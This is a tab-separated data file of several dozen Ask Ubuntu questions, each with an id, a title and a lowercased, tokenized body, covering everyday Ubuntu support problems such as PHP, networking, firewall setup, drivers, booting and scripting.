306862	updated server to raring , php not working	i updated a server to raring ring-tail , and most everything seems to work , except php5 . the ssh , apache , icecast and other functions are operational . i have tried purging the installation files , and reinstalling . this had no effect . http : //omh.umeche.maine.edu/test.php a page with phpinfo ( ) ; shows nothing . im not sure where to go with it , can anyone help me get php5 working again ?
306868	how do i get an ubuntushape to transition ( fade ) between different images ?	i have some qml code using the ui toolkit . when you click on the image , it toggles between two different logos . i 've attempted to make the transition use an animation but it does n't work ; after the duration elapses the image changes abruptly . this is n't due to network delay as you get the same behaviour if you replace the images with local urls instead . after searching the web , i came across this question on so which suggests to use two different image elements and modify the opacity to get this effect . that works with plain images , but not from within an ubuntushape due to the corner rounding and such . ( you might suggest that i reassign the image property but that does n't work either , which is this bug ) . can i do this in something approaching this simplistic way with an ubuntushape ? if not , how can i achieve the same effect without changing the look ? import qtquick 2.0 import ubuntu.components 0.1 mainview { width : units.gu ( 100 ) height : units.gu ( 75 ) page { title : `` erm '' ubuntushape { id : shape anchors.fill : parent anchors.margins : units.gu ( 10 ) state : `` ubuntu '' image : image { id : img fillmode : image.preserveaspectcrop } mousearea { anchors.fill : parent onclicked : { if ( shape.state == `` ubuntu '' ) shape.state = `` canonical '' else shape.state = `` ubuntu '' } } states : [ state { name : `` canonical '' propertychanges { target : img source : `` http : //design.ubuntu.com/wp-content/uploads/canonical-logo1.png '' } } , state { name : `` ubuntu '' propertychanges { target : img source : `` http : //design.ubuntu.com/wp-content/uploads/ubuntu-logo14.png '' } } ] transitions : transition { propertyanimation { target : shape property : `` opacity '' easing.type : easing.inoutquad from : 0 to : 1 duration : 1000 } } } } } edit : updated the transition being used . i 'm aware my understanding of transitions is a little shaky , so my problem could simply be some error here . edit 2 : got it to actually animate , which is progress . it 's not right though ; the image updates and the opacity fades in . i want it to crossfade between images . i 'm starting to think i do n't want to be using states .
306876	ubuntu error windows opens every few minutes	i have been having a problem with my installation of ubuntu 13.04 ever since i upgraded from ubuntu 12.04 . around every 5 min or so an error window will come up that says that ubuntu has encountered an error . this has also been going on my media center that is running ubuntu 13.04 . it was also from an original ubuntu 12.04 installation that i upgraded . thanks for the help edit - this is what the error message says : these are just about all of the different options it gives me to choose from . is there any one specific that you are looking for ? i left the window open so i can get what you need .
306877	how to set block size with ntfs-3g	i recently wanted to increase the block size from 1kilobyte to 16 kilobyte so i formatted it to 16kb . unfortunately when i checked today again the following came out : disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes device boot start end blocks id system /dev/sdb1 2048 976769023 488383488 7 hpfs/ntfs/exfat so this means the block size is still at 1024bytes - > 1kb right ? how would i increase this now in linux since formatting does n't help.. hope you can help : )
306884	quickly dependecies problem	i use quickly to develop an app . the thing is i wanted to use a library called beautifulsoup which is found in universe repository , under python-bs4 library . so i did a quickly configure depenedencies python-bs4 , push the code on the launchpad repository ( https : //code.launchpad.net/~fioan89/slidewall/slidewall ) and run a request build . request worked quite well , but when i tried to install the application , python-bs4 is not installed therefore the app could not run . i use ubuntu 13.04 x86 as my development environment . so , please if you have any idea about how could i make python-bs4 install as any other dependency of my app , reply to this post . also if you need other information just ask and i will do my best . thank you for your help ! ioan p.s : of course , i double checked that universe repository is enabled .
306885	why stuck in the ubuntu 13.04 installation ?	when i install the ubuntu 13.04 , it gets stuck in the `` processing triggers for update-notifier-common '' ? it 's been stuck at least 30 minutes . i did n't choose the option `` download updates while installation `` .
306888	what happens when you open wubi.exe in windows ?	in 7-zip it showed me the wubi.exe file . i opened it and it just gave me the regular wubi options , i guess ( i have n't seen it yet ) , and i wondered if i selected the intall button if it just installed with windows running . what will happen ?
306895	choosing bootloader ( dual boot )	i have removed ubuntu on my laptop because i hate the way of grub bootloader . i completely prefer windows8 bootloader instead of ubuntu ( grub ) . i want to install ubuntu again when i know how to change the bootloader ... i have searched on internet but i assume that the dual boot ( win8-linux ) explained is alongside windows not installed in separated partition . so when i turn on the laptop , it would boot just like windows8 boot but have an option : windows 8 ubuntu then it will boot normally whatever i choose ( win8 or ubuntu ) plus i want to make sure , can i install gnome desktop environment on ubuntu ( not ubuntu gnome ) please help . many thanks .
306896	arabic language in .htm files	i have a .swf ( and another .htm ) video with comments in arabic , but when i open it the words are reversed , how to solve this and thanks .
306899	how to configure acpi for battery ?	i am using : acpitool -b to print out information about my battery . it returns : battery status : < not available > when i do ls in /proc/acpi/battery , there are no files . a few other modules print out `` '' like fan and thermal . but then there are some modules ( such as cpu ) that print out just fine . so is there some kind of script i need to run to generate the bat0 file in there or do i need to create and configure it manually ? this is on ubuntu 10.10 . i am using kernel version 2.6.35-32-generic-pae . the machine is actually a robot custom built so i do n't think i have of the problems seen with toshiba , asus , etc . should n't the main concern be the type of battery i am using and the kernel version ? when i do grep acpi /boot/config-2.6.35-32-generic-pae i get the following output : # power management and acpi options config_acpi=y config_acpi_sleep=y config_acpi_procfs=y config_acpi_procfs_power=y config_acpi_power_meter=m config_acpi_sysfs_power=y config_acpi_proc_event=y config_acpi_ac=y config_acpi_battery=y config_acpi_button=y config_acpi_video=m config_acpi_fan=y config_acpi_dock=y config_acpi_processor=y config_acpi_hotplug_cpu=y config_acpi_processor_aggregator=m config_acpi_thermal=y config_acpi_custom_dsdt_file= '' '' # config_acpi_custom_dsdt is not set config_acpi_blacklist_year=2000 # config_acpi_debug is not set config_acpi_pci_slot=y config_acpi_container=y config_acpi_sbs=y config_acpi_hed=m config_acpi_apei=y config_acpi_apei_ghes=m config_acpi_apei_einj=m config_x86_acpi_cpufreq=y config_x86_powernow_k7_acpi=y config_hotplug_pci_acpi=m config_hotplug_pci_acpi_ibm=m config_pnpacpi=y config_ata_acpi=y config_pata_acpi=y # acpi drivers # acpi drivers config_thinkpad_acpi=m config_thinkpad_acpi_alsa_support=y config_thinkpad_acpi_debugfacilities=y # config_thinkpad_acpi_debug is not set # config_thinkpad_acpi_unsafe_leds is not set config_thinkpad_acpi_video=y config_thinkpad_acpi_hotkey_poll=y config_acpi_wmi=y # config_acpi_asus is not set config_acpi_toshiba=m config_acpi_cmpc=m thanks for any help .
306905	lightdm making me log in twice	the second login screen is normal . but in the first login screen , i can type any password to go through it and strange characters appear in the upper-left hand of the screen when i type . would appreciate any help greatly .
306906	can i install an older version of ubuntu over a new one ?	i installed ubuntu 12.04 lts on my old cpu and it just dose n't run right ( lags , and other bugs ) so i 'm wondering if installing an old version of ubuntu on a cpu with a newer version is possible ? like ubuntu 12.04 to 10.04 . i already have the .iso file of 10.04 and i 'm about to burn it into an installer dvd . again , i 'm wondering if installing an old version over a new one is possible as i would want to replace 12.04 with 10.04
306911	node is still in commissioning state !	i work in a lab , i have 2 dell blades and a switch . i 'm trying to create openstack using juju and maas . the blades are connected to the switch and have a private 192 ... network , and each blade itself is connected to the 10 ... internet . i have installed the maas server using ubuntu 13.04 and added the node to it , but the status of the node is still in commissioning ! i already checked the hardware clock and it is fine . how can i fix this issue ?
306916	is it possible to hide arbitrary panel indicators ?	is there a way to hide arbitrary indicators ( like messages , keyboard layout ) ? i do n't have enough screen resolution to have 10+ indicators , so i want to remove some that i do n't feel are necessary .
306917	problems with installing valgrind	i am really new with ubuntu , and i am trying install the program with this guide . but i ca n't get it to work , and i do n't understand what is going on . i was wondering if somebody could ether tell me how to get it to work or tell what the commands mean .
306920	system wo n't shutdown unless i stop networking init script	i speculate it 's networking related since i could only shut down my system if i do /etc/init.d/networking stop first . if i tried to put the system to sleep , it disconnect the network then reconnect it automatically , never goes to sleep . i uninstalled the network manager , then /etc/init.d/networking stop will not help shutdown the system anymore . when i boot into the os , there were some warning about unknown job : s20acpid , s20network-interface , s20network-manager : i got some advices to do update-rc.d -f to remove all those script , which i am not certain if it 's right thing to do . the messages are gone but the problem remains . when i tried to restart , i used to get this message : it does n't seem to be the modem manager since i later removed it . once upon a time , the froze shutting down/restarting can be restarted when i presses ctrl+alt+delete , and it says something like networking is stopped externally . if i log in single user mode , and shutdown or reboot , it show this screen i also tried grub_cmdline_linux_default = `` acpi=force '' this is a ubuntu 12.04 running on thinkpad t520 , not new installation , no such problems occurred before .
306927	apt-get failing with 2 interfaces in /etc/network/interfaces	i am running ubuntu-server 12 lts inside a vm ( using virtualbox with ubuntu 12 as the host ) . i have 2 nics set-up in virtualbox , eth0 is nat and is used to connect to the outside world and eth1 is host-only ( with dhcp provided by virtualbox ) so i can access the vm from the host machine . when i first log in , ifconfig does not display eth1 ( as expected ) and running sudo dhclient eth1 brings the interface up and gets an ip address as expected . all good so far . so then i edited /etc/network/interfaces to include the following : auto eth1 iface eth1 inet static address 192.168.56.105 netmask 255.255.255.0 gateway 192.168.56.1 after a reboot , eth1 appears in ifconfig as expected with its static ip but then apt-get update fails claiming 'temporary failure resolving ' . if i comment out the new interface definition and reboot again , it all works fine . if i just use dhclient to bring eth1 up , it all works fine but i 'd quite like to not have to do that everytime i boot the vm . i 'm not sure where to start with this one , i 'm not a native to ubuntu-land . any help would be greatly appreciated ! edit : for clarity , once the system is up and either working or not , no amount of changing files and restarting the networking service seems to change it . it 's either working or not until a complete reboot .
306929	how to install clang using precompiled binaries ?	how do i install clang on ubuntu , using precompiled binaries of clang that i downloaded ? here 's how i downloaded clang : `` llvm download page '' - > `` download llvm 3.2 '' - > `` clang binaries for ubuntu-12.04/x86_64 '' ( http : //llvm.org/releases/3.2/clang+llvm-3.2-x86_64-linux-ubuntu-12.04.tar.gz . ) then , i expanded the archive into a folder on my ubuntu 12.04 lts 64-bit machine . the contents of the expanded folder look like this : $ ls clang+llvm-3.2-x86_64-linux-ubuntu-12.04 bin docs include lib share question : what do i do next ? do i have to copy these into some folders myself , and if so , which ones exactly ? most instructions i found online are for building clang from source , which does n't apply here . i am a newbie to most of these tools . i created a basic hello-world c++ program , and was able to compile and run it , using gcc and autotools . now , i want to compile the same program with clang . thanks also asked on stackoverflow : how to install clang using precompiled binaries ? : http : //stackoverflow.com/questions/17045954/how-to-install-clang-using-precompiled-binaries . possible duplicate : how do i install llvm/clang 3.0 ? ( however , that answer does not have the specific steps needed . )
306930	is there a way to display a notification every time you change the keyboard layout ?	is there a way to show a ( notify-osd ) notification every time the keyboard layout is changed ? i have a laptop with a screen with not enough resolution to have tons/10+ indicators , and space for the title bar of windows , and i want to eliminate the keyboard indicator required when you have multiple keyboards . i 'm using unity on 13.04 .
306931	how to configure samba file server for sharing between ubuntu pc 's	i want to share one ubuntu desktop to different ubuntu desktop . i want to share files , folders and printer as well . please suggest me the right procedure to share above thing between ubuntu users .
306932	a complete list of pre-installed applications/packages ?	i 'm currently working on a ( mandatory ) stripped version of ubuntu 12.04lts gnome on my chromebook . my question is , is there any way to get a list of all the normal applications on a clean install ? not packages like `` libhtml-tagset-perl 3.20-2 '' , which is for behind-the-scenes terminal utilities , but rather things like `` eye of gnome '' or `` rhythmbox '' . actual applications that you would normally see in the dash . if that 's too much to ask or is simply unavailable , i understand . thank you for your time ! -andrew
306939	ftp client other than filezilla for ubutnu 12.04	i am using filezilla from one year but i fed-up to using filezilla for it slow working . so i change it . please suggest me other ftp client for fast uploading in ubuntu 12.04
306943	a script to monitor new files in folder so i can add them to an external xml files	i want to monitor ( by cron , i got that part covered : p ) new audio files in folders so i can add them toa separate xml files which act as an podcast rss feed . the file structure looks like this : - podcasts -- show number one -- - audio file of the show for week one.mp3 -- - audio file of the show for week two.mp3 -- show number two -- - audio file of the show for week one.mp3 -- - audio file of the show for week two.mp3 -- so on the audio file creation is automated by a computer in our studio , that uploads them to our ubuntu server so the files are accessible publicly . now , the idea is to make everything automated because we only have volounteers and they 're lazy ! : ) now , the script would need to monitor for new folders into `` podcast '' and new audio in `` show number x '' folders . everytime there is a new show folder , i need to create a new xml file for that specific show podcast and everytime there is a new audio in a show , i need to add it to the show 's xml . now i know the structure of xmls just fine , i 'm just completely in the dark when it comes to bash scripts . how can i make a script that looks for new file and folders ? can the script write within an xml file ? regards ,
306946	i have a asus g55v laptop and i was wondering which ubuntu version i should go for ?	as the title says , i have a asus g55v laptop and i was basically wondering which ubuntu version i should go for . a year ago or so was the first time i decided to try ubuntu , i had a different laptop back than and i remember encounting some problems installing and getting the newer versions that was available back then to work on my laptop . after asking for help on a forum i was told to go for ubuntu 10.04 , which worked perfectly for me . the laptop currently has windows 7 installed from the factory , and i feel that im really urging to get back to using ubuntu . thanks
306953	ca n't login to my account	after typing my password and press enter it takes me back to the page and ask to me to enter my password again i can login as a guest and am able to login in the terminal ( ctrl+alt+f1 ) but not with the graphical interface
306954	is there a gui for command-line tools and drupal management ?	i have a physically disabled sysadmin who wants a gui for specifically installing and updating drupal which is the primary thing he will be doing . we have a working apache and drupal installation now . this raises some sub-questions : is there a gui version of wget for example ? i know there is phpmyadmin , but i 've been warned against installing it for obvious reasons . i assume the package manager will take care of apache . i have tried the automatic taskel . it worked for lamp , but did not work for drupal . any suggestions would be greatly appreciated . even a text to speech command line could help a lot . i know this question is hard to answer , but i appreciate your help .
306955	why do interface items keep disappearing ?	every so often my ubuntu install goes a little weird . when i mouse-over any window decorations , or interface elements in some apps , they vanish . the window itself is still visible , just empty . i ca n't take a screenshot , because if i load a screenshot app i ca n't see what to click to grab a screenshot , so here 's a photo instead . i do n't know what 's causing this . the interface elements are all still click-able ; i can maximize windows , open items ... everything , if i click in the right place . i just ca n't see what i 'm clicking . the global menu bar loads fine , and i see all menu options in the bar , but not in the drop-downs . my dropbox icon is visible and functional , and the drop-down menu loads on click ... but it 's empty . what could be causing this , and how can i get back to a working interface without restarting the machine or logging out ? i 'm using 13.04 , compiz/unity with a geforce gt 640 card with the nouveau driver .
306963	why do n't i need to install any drivers for ubuntu	so when i install the windows , i need to install all the drivers that are respective to my laptop . why do n't i do the same with ubuntu installation ? does the installation somehow detects my hardware and install proper drivers on its own ? thanks
306965	how to set image open-with via terminal ?	i am running openbox and so do not have access to standard ubuntu control panel , but must set everything from the terminal . when i download an image in chrome and click open , it launches xdg-open which then launches an arbitrary program ( it resorts to internet explorer on wine if i uninstall those programs ) . how do i control which program is loaded for an image of type .jpg ( and others ) ?
306968	shorewall ip forwarding problems in 12.04 lts	internet connectivity through my 12.04 lts shorewall box is spotty at best . ping works both locally and to the internet with no dropped packets ( from both the box itself and internal lan ) . http connections work great through squid , but when i do n't use squid they are slow and spotty . ssh is also slow and sometimes connecting can be difficult . https and email do n't work at all . this box is replacing an 11.04 box with the same setup that worked fine . it 's a fresh install of 12.04 lts on new hardware . network config : % ifconfig eth0 link encap : ethernet hwaddr bc:5f : f4:47:99:24 inet addr : x.x.x.x bcast:255.255.255.255 mask:255.255.254.0 up broadcast running multicast mtu:576 metric:1 rx packets:36215 errors:2882 dropped:0 overruns:0 frame:2882 tx packets:6652 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2983691 ( 2.9 mb ) tx bytes:660681 ( 660.6 kb ) interrupt:16 eth1 link encap : ethernet hwaddr bc:5f : f4:47:99:22 inet addr:10.0.0.1 bcast:10.0.0.255 mask:255.255.255.0 inet6 addr : fe80 : :be5f : f4ff : fe47:9922/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:5875 errors:0 dropped:9 overruns:0 frame:0 tx packets:4424 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:661913 ( 661.9 kb ) tx bytes:762000 ( 762.0 kb ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:18 errors:0 dropped:0 overruns:0 frame:0 tx packets:18 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1284 ( 1.2 kb ) tx bytes:1284 ( 1.2 kb ) i do n't think it 's a routing issue : % route kernel ip routing table destination gateway genmask flags metric ref use iface default x.x.x.x 0.0.0.0 ug 100 0 0 eth0 10.0.0.0 * 255.255.255.0 u 0 0 0 eth1 x.x.x.0 * 255.255.254.0 u 0 0 0 eth0 i 've enabled ip forwarding : % sudo sysctl net.ipv4.ip_forward net.ipv4.ip_forward = 1 i 've tried with rp_filter on and off with the same results . i 've tried specifically adding a rule to shorewall to allow traffic through on 80 and 443 , but it did n't fix it ( and should n't be necessary with the given policy ) . shorewall config is as follows : % grep -v ^ # /etc/shorewall/interfaces net eth0 detect dhcp loc eth1 detect dhcp % grep -v ^ # /etc/shorewall/zones fw firewall net ipv4 loc ipv4 % grep -v ^ # /etc/shorewall/rules section new ping ( accept ) fw loc % grep -v ^ # /etc/shorewall/policy fw fw accept info fw net accept info fw all reject warning loc fw accept info loc net accept info net fw reject notice net loc drop error all all reject info % grep -v ^ # /etc/shorewall/masq eth0 10.0.0.0/24 relevant iptables : % sudo iptables -l ... chain net2loc ( 1 references ) target prot opt source destination dynamic all -- anywhere anywhere ctstate invalid , new accept all -- anywhere anywhere ctstate related , established drop all -- anywhere anywhere log all -- anywhere anywhere log level error prefix `` shorewall : net2loc : drop : '' drop all -- anywhere anywhere ... % sudo iptables -t nat -l -v -n ... chain postrouting ( policy accept 116 packets , 8749 bytes ) pkts bytes target prot opt in out source destination 189 12557 eth0_masq all -- * eth0 0.0.0.0/0 0.0.0.0/0 chain eth0_masq ( 1 references ) pkts bytes target prot opt in out source destination 73 3808 masquerade all -- * * 10.0.0.0/24 0.0.0.0/0 everything looks okay to my eyes . i think it 's a connection tracking issue , but i 'm not sure how to go about diagnosing it , much less fix it . any help is greatly appreciated .
306971	install package along with all the dependencies offline	right now i have 2 computers : has connection to the internet and has installed package a . does n't have connection to the web . on this pc i need to install package a. i decided to download all needed packages using first pc and transfer them to the second pc via usb . i have searched how to get all needed packages for some deb installation and here 's what i 've found . but when i run : apt-get -- print-uris -- yes install a | grep ^\ ' | cut -d\ ' -f2 > downloads.list on first pc i got empty file because this package is already installed there ( and i do n't want to uninstall it ) . also package a is very complicated and depends on package b which depends on package c and package c is not installed on the second pc . so how can i download all needed packages ? or is there any other way of installing it ?
306976	how to install ubuntu touch on unofficial cyanogenmod ports	i have a samsung galaxy s plus i9001 and i would like to install ubuntu touch on it , but my device is not officially supported by cyanogenmod . anyway a port exists and also some derived roms ( like ehndroix ) . if exists , what is the path to create a working ubuntu-touch build for my device ? thank you in advance .
306981	60 sec delay between bios and grub screen	i have a dual-boot ubuntu/windows 7 setup . both are on the same ssd . when i installed mint 13 a while ago it put grub on there and i got this strange delay : after the bios finishes loading , a blinking cursor ( underscore ) comes up on the screen and it takes 60 seconds before it changes into that purplish one and i can choose an os . ( the 10 sec delay there is fine . ) i just put reformatted mint 's partition and put ubuntu 13.04 on there and i believe i replaced the grub on that ssd in the process . that delay is still there . any ideas ? i also ran boot-repair ( with default settings ) and that did n't have any effect .
306982	how to install lib32-libpulse on 64 bit ubuntu system ?	i have a problem with skype . so i found that the solution to it is to install lib32-libpulse-4.0-1-x86_64.pkg.tar library . i found that i should install ia32-libs . so i installed it without any problems . then i try to type : apt-get lib32-libpulse and i get e : invalid operation lib32-libpulse why ? what should i do to solve this ?
306983	sudo and launcher icons not working , hard-disks not mounting	i am running a server on ubuntu 12.04 ( desktop ) lts . this has been working fine until today when a few minutes ago it decided to change some stuff alone . launcher icons not working launcher icons ( includind dash ) have become the normal size ( i know this is cosmetic but it did it alone ) it wo n't shutdown ( except using sysrq ) i have 2 external hard-disks connected to it but ubuntu is not mounting them . sudo commands are not working ( giving me must be setuid root ) an icon `` gksu '' is present on the desktop , when i click it ( since gksu is a frontend for su or sudo ) nothing happens and then it disappears . when i go on ubuntu software centre after some time ( seconds ) it crashes with a crash report . network icon on the toolbar is not visible but it is connected to my network as it is visible from other computers . only things working from the launcher are the terminal and the file explorer i did manage to reboot it ( using sysrq ) but to no avail ( i thought that it might fix during startup as it sometimes does ) . thanks in advanced
306984	the system is running in low-graphics mode on hybrid gpu	im running ubuntu 13.04 on my sony vpcsb37_ga with intel and amd graphic cards i followed this tutorial so i can switch between intel and amd and it was working good , till yesterday . now i can only boot on intel , whenever i switch to amd by : sudo aticonfig -- xp-dgpu and reboot , i get the `` the system is running in low-graphics mode '' . i am using the tty1 to run : sudo aticonfig -- xp-igpu and get back to the intel card . i do n't know what happened , maybe because of an update ? i also re-installed everything from the same tutorial and re-installed ubuntu-desktop and lightdm but nothings works .
306986	i 'm trying to mount ubuntu to a dvd and make it bootable . i just can not figure out how to do it .	can anyone help me ? i 'm trying to use ubuntu to mod windows 7 to bypass a forgotten password .
306991	how to create a persistent usb installation from mac ?	with current instructions in ubuntu.com i know how to create an usb to boot from mac . it works but it is not a persistent installation . how can i make a persistent ubuntu 13.4 installation in a usb key to work in mac book air ?
306992	is there a way to start multiple applications at once and arrange their windows ?	let 's say i usually have three windowed apps running at the same time : chrome emacs terminal i like for them to be arranged the same way . i want this to happen on all of my desktops ( or whatever the heck they are officially known as ) . how can i open these apps so that they appear in the same location ?
306993	vod system on home server	i 'm going crazy ! i hope someone can lead me to solution here . honestly this is my last resort , i already used up google and other forums . i 'm trying to make a simple vod system . i 've a ubuntu server 12.04 at home . it has allot of documentaries made by me and i 'd love to put them to use . i want to make site where i embed this videos , via jwplayer maybe , this site will be hosted on vps . but physically i want files to be located on my home server . i tried red5 , crtmpserver and none work ! on ubuntu , i literally spent 5 days configuring red5 to work , and nothing ! is there something that works for ubuntu in this area ?
306994	how to use actionselectionpopover qml component	i 'm trying to use the actionselectionpopover located here , i ca n't find any examples on how to actually execute/show it , from looking at the demo qml files this is what i have come up with : /* popup menu when right clicking items */ actionselectionpopover { id : contextmenu actions : actionlist { action { text : i18n.tr ( `` view item info '' ) ontriggered : print ( text ) } } } then later i have this in an item : onclicked : { contextmenu.caller = item ; contextmenu.show ( ) ; print ( item ) ; } now the item is printed , but the actionselectionpopover does not show .
306998	how to install ubuntu on a very old pc	i 'd like to install ubuntu on a 12-year-old laptop currently running win xp . the dvd/cd drive is dead , and the machine ca n't boot from a usb stick . moreover , it ca n't even read a usb stick over 1gb . is there any way , or is it the impossible dream ?
307002	how can i install ubuntu 13.04 on a mac ( using disk ) ?	i called a local computer store and they said ubuntu 13.04 `` does n't like mac '' and it 's very hard to do and requires lots of `` codes '' . they said they would charge me $ 99 to do it . but i have read some articles online where people have done it themselves . i am confused about what the computer guy said vs. people online . please let me know how i can install it .
307007	how to repair installation , accidentally deleted /sbin/initctl	i 'm running ubuntu 12.04 on a virtualbox . i was trying to create a central log server with rsyslog . at some point i made changes to the conf file and tried to restart rsyslog , but started getting the following error : unable to connect to upstart : failed to connect to socket /com/ubuntu/upstart : connection refused following what this question suggested http : //ubuntuforums.org/showthread.php ? t=1997229 i issued the following commands dpkg-divert -- local -- rename -- add /sbin/initctl ln -s /bin/true /sbin/initctl however this did not resolve the issue as running the following was not actually restarting rsyslog . service rsyslog restart so i tried to undo the initial commands by doing dpkg-divert -- local -- remove /sbin/initctl rm /sbin/initctl however deleting initctl started causing other issues . so i rebooted the machine , and the machine would n't boot normally . i went into recovery mode , and before displaying the recovery menu it printed /proc/self/fd/9 : 5 : /proc/self/fd/9 : initctl : not found . does anyone know how i can restore the initctl ? edit : i also booted the vm with the iso image for 12.04 and went to recovery menu , however there does not seem to be a way of restoring the deleted files .
307009	linux basic commands	i 'm new here . i just want to learn the basics of ubuntu terminal ! i know the very basic commands like changing directory , renaming , creating & deleting files . i 'm looking for commands like installing apps and some basic sudo commands . thank you . have a nice day : )
307010	compiz - what effect i really do n't need	what effects i do n't need but still i want to have nice 3d desktop . i want to get best performance - eyecandy balance . can you give me some suggestions . thanks
307014	populate contacts with carddav	using ubuntu raring and it seems comes with gnome contacts . i 'm wondering if there 's a way to populate the eds via carddav ? mainly because i see the thunderbird has an address book tied to this eds and thunderbird itself does n't support carddav . however i 'm thinking if i can get my carddav server sycned with eds , that list will be usable in thunderbird .
307018	forcing screensaver lockout time for all users in unity	i am using ubuntu 12.04 and unity . is there a way to force the screensaver lockout time using an admin account ? by default each user can change their lockout time . i need to be able to prevent this . thanks , aaron
307019	can i specify video format and pixels orientation when using clive for downloading youtube videos ?	can i specify video format and pixels orientation when using clive for downloading youtube videos ? if yes , what is command ?
307020	apt-get or aptitude is running on my laptop and doesn´t let my update my software , how do i turn it of ?	when i try to update the software on my laptop it says i can´t update everything at the same time but i can upgrade gradually , but then a window pops up and says that `` apt-get or aptitude '' currently is running and i have to turn it of to be able to update the software but i can´t figure out how to turn it of .
307022	does restoring dd image override whole disk ?	i have a pc running ubuntu 12 ( dedicated ) that i have created a dd image from , and another laptop with ubuntu as dual-boot with windows 7 . what i have done is i have taken that image from the pc , and tried to clone it to the laptop driver on ubuntu , but later after restarting the computer , the hardisk does n't boot anything any longer . i have tried using a hdd case to use the hard disk as an external hdd in a pc , the disk utility shows the hdd volume as unknown , and the partition type as linux ( 0x83 ) . did i just erase my whole data ? and what can i do from this point ? thanks !
307023	command not working in .profile	in my .profile i have the following command , [ [ -s `` $ home/.rvm/scripts/rvm '' ] ] & & source `` $ home/.rvm/scripts/rvm '' right now , to get my desired behavior i have to type source ~/.profile in the terminal . i would like this to be automatic ( since it 's in .profile ) , but it 's not . any ideas ? my .profile is being executed when i login ( tested it with export foo=bar ) .
307029	rhythembox and iphone 5 syncing on 13.04	rhythembox 2.98 sees my iphone 5 64gib ios 6.1.4 , i can view the information page and can set up a sync , however , when i right click and select sync . rhythembox crashes without any details ! i know that the only way to upgrade and sync apps on the iphone is through itunes , which we all know , does not work on a linux platform . the question is , is this a known bug and if so , is there a fix on the way ? each day takes me another step towards deleting windows once and for all time .
307037	crontab not working with inner unix command	i have following crontab entry which does not work . please can anybody help ? @ midnight scp /home/xxx/file.txt xxx @ yyy : ~/zzz/file.txt_`date + '' % m- % d- % y '' ` this command works very well when run from command line . this is trying to backupo file to another machine every day with current date appended to it .
307041	how to use syslog for else output ( show up with whois - query ) ?	there is log-file /var/log/syslog with the output of ip-addresses like e.g . src=10.158.0.1 . i want to scan from this file every printed address in src= ... and then to make query with whois ( src= ... ) . this query should be monitored . mine attempt is wrong and looks like this in a bash-script : # /bin/bash while [ 1 ] do grep ‘src=ip-address’ /var/log/syslog > > /home/ $ user/topsecret001/pitbull001.txt ; whois ‘src=ip-address’ > > /home/ $ user/topsecret001/pitbull002.txt ; done can somebody help with a trick ? how should i define ip-address and how can i use command whois with this ip-address ? the output of /var/log/syslog looks like this snippet here : http : //paste.ubuntu.com/5859332/ the output of /var/log/syslog looks like this - when there is a little alert ( like today ) : http : //paste.ubuntu.com/5862958/ idea would be too - to perform a whois-query only if there is `` invalid state '' popping up in the line of the scrolling syslog . thank you for your contributions . i have learnt something by your codes . often the solutions are looking easier than thought like here - cause i thought it would be more difficulty . i think with recent contribution of enzotib then this question is solved already now .
307050	how to open scripts from second life viewer into console vim	i want everything that has to do with text to be edited within console vim with tabs . my problem is that i ca n't open files in console vim from gui , i can only open them in gvim . does anyone know how i can do such a thing ? for example my most frequent issue is with a game called second life . in this game you can write scripts and it gives you the option to edit your scripts in external editors . i want my external editor to be console vim . these are the instructions from the game : externaleditor : path to program used to edit lsl scripts and xui files , e.g . : /usr/bin/gedit -- new-window `` % s '' . so when i put : `` /usr/bin/x11/gvim '' `` % s '' it works for gvim , but it opens a new one each time i edit a new script and this does n't work at all for console vim . i tried vim server , but it was a failure . if someone knows how to do what i want , please share . thanks in advance .
307052	how to boot ubuntu linux from a usb drive ?	i created a flash drive with 12.04 ubuntu on it , because i want to try it and explore it . i ca n't get my computer to boot from the drive . i used the suggested pendrive program to format the drive . i opened my boot menu when i started my computer and it did n't have the option to boot from the flash drive . is there anything i can do or should i just give up and burn it to a disk ?
307053	bumblebee and nvidia	i am a linux newbie having freshly installed ubuntu for first time . i have nvidia geforce gt630m and question about it . i could n't get nvidia driver to work . i tried to follow different instructions over the net but it does n't show in the additional drivers and i coud n't make it run from the console either . keep in mind the fact that i tried to blacklist the nouveau driver and i do n't know if i succeeded . i also could n't configure the xconfig ( i guess that was its name ? ) . so i installed bumblebee driver . in additional drivers nothing show again but it says now in details/graphics it 's intel ivybridge mobile and with some command optirun something in the console ( i forgot it sorry ) it opens a window that give details about my nvidia card . so my question is : is this bumblebee driver actual substitute for the nvidia driver giving the pc the same performance as the official driver and if it 's not can you give me precise instructions how to get the nvidia driver to work ( how to blacklist nouveau , configure xconfig , install nvidia etc ) step by step . i just started learning programming at school and i am a huge linux enthusiast that is keen on learning . unfortunately i have no idea how to work with the terminal and how to get this drivers to work ( or are they working with bumblebee ? ? ) . so any help would be appreciated .
307054	is ubuntu for android by canonical available to the average user yet ?	i recently found out about ubuntu for android multi-core smartphones and was digging around on the ubuntu website as well as the canonical website but have yet to find any information on if it available to the public yet ? i am very interested to try it our on my android and if it is available for the public am wondering where and how i can get a copy of `` ubuntu for android '' ? if it is not available then perhaps someone can shed some lite on what sort of timeframe it will be until it is available to the general public ?
307059	problems with ubuntu 13.04 booting from live dvd	okay , so i 've partitioned my hard drive so i can install ubuntu on it . every time i put the disk in , it takes forever for it to get off of the ubuntu load screen , and when it does , it just takes me to the terminal and says that there was an error in mounting the file systems . i do n't know what to do , and i 've been trying for the last few hours . this is getting me very annoyed . can anyone help ? also , i do n't know if this helps , but when i press esc during the loading , it comes up with a wall of text saying it is failing to start line 7 or something . [ edit ] now i am trying to install ubuntu with a live usb , but now the desktop is all i see , with a spinning cursor .
307064	are there drivers for epson bx625fwd ?	are there drivers available for the `` epson stylus office bx625fwd '' printers for ubuntu 12.04 ?
